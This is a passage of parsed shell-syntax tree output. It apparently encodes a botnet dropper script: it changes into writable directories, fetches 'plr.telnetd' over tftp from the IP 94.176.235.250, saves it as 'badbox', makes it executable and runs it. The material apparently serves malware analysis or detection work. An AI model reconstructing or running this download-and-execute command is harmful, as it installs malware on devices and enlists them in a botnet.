  CommandNode(lineno=15, pos=(1605, 1615), parts=[
    WordNode(lineno=15, pos=(1605, 1610), word='chmod'),
    WordNode(lineno=15, pos=(1611, 1613), word='+x'),
    WordNode(lineno=15, pos=(1614, 1615), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1615, 1616)),
  CommandNode(lineno=15, pos=(1616, 1624), parts=[
    WordNode(lineno=15, pos=(1616, 1624), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1625, 1761), parts=[
  CommandNode(lineno=16, pos=(1625, 1632), parts=[
    WordNode(lineno=16, pos=(1625, 1627), word='cd'),
    WordNode(lineno=16, pos=(1628, 1632), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1633, 1635)),
  CommandNode(lineno=16, pos=(1636, 1647), parts=[
    WordNode(lineno=16, pos=(1636, 1638), word='cd'),
    WordNode(lineno=16, pos=(1639, 1647), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1648, 1650)),
  CommandNode(lineno=16, pos=(1651, 1658), parts=[
    WordNode(lineno=16, pos=(1651, 1653), word='cd'),
    WordNode(lineno=16, pos=(1654, 1658), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1659, 1661)),
  CommandNode(lineno=16, pos=(1662, 1670), parts=[
    WordNode(lineno=16, pos=(1662, 1664), word='cd'),
    WordNode(lineno=16, pos=(1665, 1670), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1671, 1673)),
  CommandNode(lineno=16, pos=(1674, 1678), parts=[
    WordNode(lineno=16, pos=(1674, 1676), word='cd'),
    WordNode(lineno=16, pos=(1677, 1678), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1678, 1679)),
  CommandNode(lineno=16, pos=(1680, 1717), parts=[
    WordNode(lineno=16, pos=(1680, 1684), word='tftp'),
    WordNode(lineno=16, pos=(1685, 1687), word='-r'),
    WordNode(lineno=16, pos=(1688, 1699), word='plr.telnetd'),
    WordNode(lineno=16, pos=(1700, 1702), word='-g'),
    WordNode(lineno=16, pos=(1703, 1717), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1717, 1718)),
  CommandNode(lineno=16, pos=(1718, 1741), parts=[
    WordNode(lineno=16, pos=(1718, 1721), word='cat'),
    WordNode(lineno=16, pos=(1722, 1733), word='plr.telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1735, 1741), word='badbox'), pos=(1734, 1741), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1741, 1742)),
  CommandNode(lineno=16, pos=(1742, 1752), parts=[
    WordNode(lineno=16, pos=(1742, 1747), word='chmod'),
    WordNode(lineno=16, pos=(1748, 1750), word='+x'),
    WordNode(lineno=16, pos=(1751, 1752), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1752, 1753)),
  CommandNode(lineno=16, pos=(1753, 1761), parts=[
    WordNode(lineno=16, pos=(1753, 1761), word='./badbox'),
  ]),
])
